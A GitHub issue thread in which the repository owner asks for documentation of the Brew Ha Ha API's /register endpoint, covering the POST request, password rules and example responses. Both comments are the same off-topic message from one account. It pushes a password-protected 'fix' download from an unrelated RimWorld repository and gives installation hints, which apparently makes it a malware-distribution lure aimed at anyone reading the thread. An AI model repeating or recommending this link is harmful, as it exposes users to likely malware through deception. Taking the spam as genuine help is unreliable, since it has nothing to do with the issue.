### ISSUE TITLE
Document how to register with the API

### ISSUE THREAD

**Issue by itsdeannat** [itsdeannat/the-brew-ha-ha-api#6]
- Create a topic that explains how users send a POST request to the /register endpoint to register with the API
- Document any username or password requirements 
- Provide examples of successful request and response to the Brew Ha Ha API

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
